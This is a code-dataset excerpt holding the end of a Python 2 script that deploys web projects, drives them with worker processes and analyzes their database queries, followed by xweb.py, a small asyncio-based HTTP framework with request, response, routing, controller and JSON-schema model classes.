        size = cur.fetchone()[0]
    finally:
        # Previously the cursor was leaked on every call.
        cur.close()
    return size
def main():
    # Orchestrates one benchmark run: deploy the target web project,
    # drive it with concurrent worker processes, then analyze the
    # captured queries and database state.
    # parse args
    parser = argparse.ArgumentParser()
    parser.add_argument('--attempt_info', type=str)
    parser.add_argument('--deploy_id', type=int)
    parser.add_argument('--database', type=str)
    parser.add_argument('--host', type=str)
    parser.add_argument('--port', type=int)
    parser.add_argument('--name', type=str)
    parser.add_argument('--username', type=str)
    parser.add_argument('--password', type=str)
    parser.add_argument('--num_threads', type=int)
    parser.add_argument('--timeout', type=int)
    parser.add_argument('--size', type=int)
    args = parser.parse_args()
    # get args: attempt_info is a JSON file describing the repo/attempt
    with open(args.attempt_info, 'r') as attempt_info_file:
        attempt_info = json.loads(attempt_info_file.read())
    deploy_id = args.deploy_id
    database_config = {
        'database': args.database,
        'host': args.host,
        'port': args.port,
        'name': args.name,
        'username': args.username,
        'password': args.password
    }
    num_threads = args.num_threads
    timeout = args.timeout
    size = args.size
    # get deployer: map the numeric project type to a deployer class and
    # import it dynamically from the deployers package.
    project_type = attempt_info['repo_info']['project_type']
    deployer_class = {
        1: 'DjangoDeployer',
        2: 'RoRDeployer',
        3: 'NodeDeployer',
        4: 'DrupalDeployer',
        5: 'GrailsDeployer'
    }[project_type]
    moduleName = "deployers.%s" % (deployer_class.lower())
    moduleHandle = __import__(moduleName, globals(), locals(), [deployer_class])
    klass = getattr(moduleHandle, deployer_class)
    deployer = klass(None, None, deploy_id, database_config)
    result = deployer.deploy(attempt_info)
    if result != 0:
        # Deployment failed: tear the server down and exit non-zero.
        deployer.kill_server()
        sys.exit(-1)
    LOG.info('Running driver ...')
    driver = BaseDriver(deployer.get_main_url(), deployer.get_database(), deployer.deploy_id, deployer.base_path, deployer.log_file)
    try:
        driver.bootstrap()
        driver.initialize()
    # Python 2 exception syntax; errors here are logged and the run
    # continues with whatever state the driver reached.
    except Exception, e:
        traceback.print_exc()
    LOG.info('Start Driving the Database ...')
    actions_cnt = 0
    processes = []
    try:
        # disable logging of requests
        logging.getLogger("requests").setLevel(logging.WARNING)
        logging.getLogger("urllib3").setLevel(logging.WARNING)
        # multi-processing: each worker reports its action count on the
        # shared queue; one get() per worker collects the totals.
        queue = Queue()
        for _ in range(num_threads):
            process = Process(target = run_driver, args = (driver, timeout, size, queue))
            processes.append(process)
            process.start()
        for process in processes:
            process.join()
        for _ in range(num_threads):
            actions_cnt += queue.get()
    except Exception, e:
        traceback.print_exc()
    LOG.info('The number of actions submitted : {}'.format(actions_cnt))
    # kill server
    deployer.kill_server()
    # analyze: feed the queries captured per form/url to the analyzer
    LOG.info('Analyzing queries ...')
    analyzer = get_analyzer(deployer)
    for form, _ in driver.forms:
        analyzer.analyze_queries(form['queries'])
    for url in driver.urls:
        analyzer.analyze_queries(url['queries'])
    LOG.info(analyzer.queries_stats)
    # extract database info
    LOG.info('Extracting database info ...')
    analyzer.analyze_database()
    LOG.info(analyzer.database_stats)
    LOG.info('Database Size : {} '.format(get_database_size(deployer)))
    LOG.info('Finishing ...')
|
xweb.py | import asyncio
import multiprocessing
import os
import socket
import ujson as json
from email.utils import formatdate
from functools import partial
from http import HTTPStatus
import httptools
from jsonschema import Draft4Validator, ErrorTree
__version__ = '3.0.1'
class HTTPException(Exception):
    """
    Signal an HTTP error response carrying a status code plus an
    optional message and properties payload.
    """

    def __init__(self, status, msg=None, properties=None):
        self.status = status
        self.msg = msg
        self.properties = properties
class Request:
    """
    Mutable container for an incoming HTTP request's parsed fields.

    Supports dict-style get/set (``req["method"]``) as an alias for
    attribute access.
    """

    def __init__(self):
        self.headers = {}
        self.method = "HEAD"
        self.url = "/"
        self.raw = None  # request body bytes, filled in by the protocol
        self.ip = None

    def __getitem__(self, name):
        return getattr(self, name)

    def __setitem__(self, name, value):
        setattr(self, name, value)
class Response:
    """
    Mutable container for the outgoing HTTP response; ``bytes(resp)``
    serializes it to a raw HTTP/1.1 message.
    """

    def __init__(self):
        self.body = ""
        self.status = 200
        self.msg = ""
        # Date is computed once at construction time, GMT-formatted.
        self.headers = {
            'Date': formatdate(timeval=None, localtime=False, usegmt=True),
            'Content-Type': 'text/plain'
        }

    def __getitem__(self, name):
        return getattr(self, name)

    def __setitem__(self, name, value):
        setattr(self, name, value)

    def __bytes__(self):
        """Serialize status line, headers and body into wire bytes."""
        http_status = HTTPStatus(self.status)
        body_bytes = self.body.encode()
        # Content-Length must reflect the encoded byte count.
        self.headers['Content-Length'] = len(body_bytes)
        status_line = f"HTTP/1.1 {http_status.value} {http_status.phrase}".encode()
        header_block = "\r\n".join(f'{k}: {v}' for k, v in self.headers.items()).encode()
        return status_line + b'\r\n' + header_block + b'\r\n\r\n' + body_bytes
class Context:
    """
    Per-request bundle pairing a Request with a Response.

    Unknown attribute reads fall through to the request object, so
    handlers can write e.g. ``ctx.method``; body/status/msg properties
    proxy the response.
    """

    def __init__(self):
        self.req = Request()
        self.resp = Response()
        self.write = None  # assigned by the protocol: transport.write

    def send(self, _):
        """Serialize the response and push it down the transport."""
        self.write(bytes(self.resp))

    def check(self, value, status=400, msg='', properties=""):
        """Abort with *status* unless *value* is truthy."""
        if not value:
            self.abort(status=status, msg=msg, properties=properties)

    def abort(self, status, msg="", properties=""):
        """Raise an HTTPException carrying the given status/message."""
        raise HTTPException(status=status, msg=msg, properties=properties)

    def __getattr__(self, item):
        # Only reached when normal lookup fails: delegate to the request.
        return getattr(self.req, item)

    def __getitem__(self, item):
        return getattr(self, item)

    def __setitem__(self, key, value):
        setattr(self, key, value)

    @property
    def headers(self):
        """The response headers mapping."""
        return self.resp.headers

    @property
    def json(self):
        """The response body parsed as JSON."""
        return json.loads(self.body)

    @property
    def body(self):
        return self.resp.body

    @body.setter
    def body(self, value):
        self.resp.body = value

    @property
    def status(self):
        return self.resp.status

    @status.setter
    def status(self, value):
        self.resp.status = value

    @property
    def msg(self):
        return self.resp.msg

    @msg.setter
    def msg(self, value):
        self.resp.msg = value
class HTTPProtocol(asyncio.Protocol):
    """
    asyncio protocol bridging httptools' HTTP parser callbacks to the
    application handler.

    A fresh Context is created per request (in on_url) and handed to the
    handler once the message is complete.
    """
    def __init__(self, handler, loop):
        self.parser = None
        self.transport = None
        self.handler = handler  # the application coroutine to await per request
        self.loop = loop
        self.ctx = None

    def connection_made(self, transport):
        """Create a request parser bound to this connection."""
        self.parser = httptools.HttpRequestParser(self)
        self.transport = transport

    def on_url(self, url):
        """Parser callback: start a new Context and record path/method."""
        self.ctx = Context()
        self.ctx.write = self.transport.write
        url = httptools.parse_url(url)
        self.ctx.req.path = url.path.decode()
        self.ctx.req.method = self.parser.get_method().decode()

    def on_header(self, name, value):
        """Parser callback: store one decoded header."""
        self.ctx.req.headers[name.decode()] = value.decode()

    def on_body(self, body):
        """Parser callback: accumulate request-body bytes.

        Request.raw starts as None, so it is initialised on the first
        chunk; previously this line raised TypeError (None += bytes) for
        any request that carried a body.
        """
        if self.ctx.req.raw is None:
            self.ctx.req.raw = b''
        self.ctx.req.raw += body

    def on_message_complete(self):
        """Parser callback: run the app handler, then send the response."""
        task = self.loop.create_task(self.handler(self.ctx))
        task.add_done_callback(self.ctx.send)

    def data_received(self, data):
        self.parser.feed_data(data)

    def connection_lost(self, exc):
        self.transport.close()
class App:
    # The application object: owns the route table and the worker
    # processes that each run their own event loop over a shared socket.
    def __init__(self):
        self.workers = set()
        self.routes = {}  # path -> Controller class; populated externally
    def serve(self, sock):
        # Worker-process entry point: run a fresh event loop serving the
        # inherited listening socket.
        loop = asyncio.new_event_loop()
        server = loop.create_server(partial(HTTPProtocol, loop=loop, handler=self), sock=sock)
        loop.create_task(server)
        try:
            loop.run_forever()
        except KeyboardInterrupt:
            # NOTE(review): loop.create_server() returns a coroutine, not
            # a Server object, so server.close() here looks like it would
            # raise AttributeError; the Server from the scheduled task
            # should be closed instead - confirm and restructure.
            server.close()
            loop.close()
    def listen(self, port=8000, host="127.0.0.1", workers=multiprocessing.cpu_count()):
        # Bind a non-blocking, SO_REUSEADDR socket once in the parent and
        # fork worker processes that all accept on it (pre-fork model).
        import uvloop
        asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
        pid = os.getpid()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.setblocking(False)
        sock.bind((host, port))
        # The socket fd must survive exec/fork into the workers.
        os.set_inheritable(sock.fileno(), True)
        try:
            print(f'[{pid}] Listening at: http://{host}:{port}')
            print(f'[{pid}] Workers: {workers}')
            for _ in range(workers):
                worker = multiprocessing.Process(target=self.serve, kwargs=dict(sock=sock))
                worker.daemon = True
                worker.start()
                print(f'[{pid}] Starting worker with pid: {worker.pid}')
                self.workers.add(worker)
            for worker in self.workers:
                worker.join()
        except KeyboardInterrupt:
            # Ctrl-C: terminate every worker, then close the shared socket.
            print('\r', end='\r')
            print(f'[{pid}] Server soft stopping')
            for worker in self.workers:
                worker.terminate()
                worker.join()
            print(f'[{pid}] Server stopped successfully!')
            sock.close()
    async def __call__(self, ctx):
        # Per-request dispatch: look up the controller by path, run it,
        # and translate HTTPException into the response status/body.
        try:
            handler = self.routes.get(ctx.req.path)
            if not handler:
                raise HTTPException(404)
            await handler(ctx).request()
        except HTTPException as e:
            ctx.status = e.status
            ctx.body = e.msg or HTTPStatus(e.status).phrase
            ctx.msg = e.properties
class Controller:
    """
    Base request controller: dispatches to the instance method named
    after the lowercased HTTP verb (get/post/...), aborting with 405
    when no such method exists.
    """

    def __init__(self, ctx):
        self.ctx = ctx

    async def request(self):
        """Invoke the handler matching the request method, or raise 405."""
        verb = self.ctx.req.method.lower()
        handler = getattr(self, verb, None)
        if not handler:
            raise HTTPException(405)
        await handler()
class RESTController(Controller):
    """
    Controller variant that speaks JSON: forces the response content
    type and serializes whatever body the verb handler produced.
    """

    async def request(self):
        # Set the header first so even an aborting handler sees it.
        self.ctx.headers['Content-Type'] = 'application/json'
        await super().request()
        self.ctx.body = json.dumps(self.ctx.body)
class Model:
    """
    Base model carrying a JSON-schema class attribute; validate() checks
    payloads against it.
    """

    schema = {}  # subclasses override with a Draft-4 JSON schema

    @classmethod
    def validate(cls, data):
        """Return *data* if it matches cls.schema, else abort with 400."""
        validator = Draft4Validator(cls.schema)
        errors = ErrorTree(validator.iter_errors(data)).errors
        if errors:
            raise HTTPException(400, msg=str(errors))
        return data
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.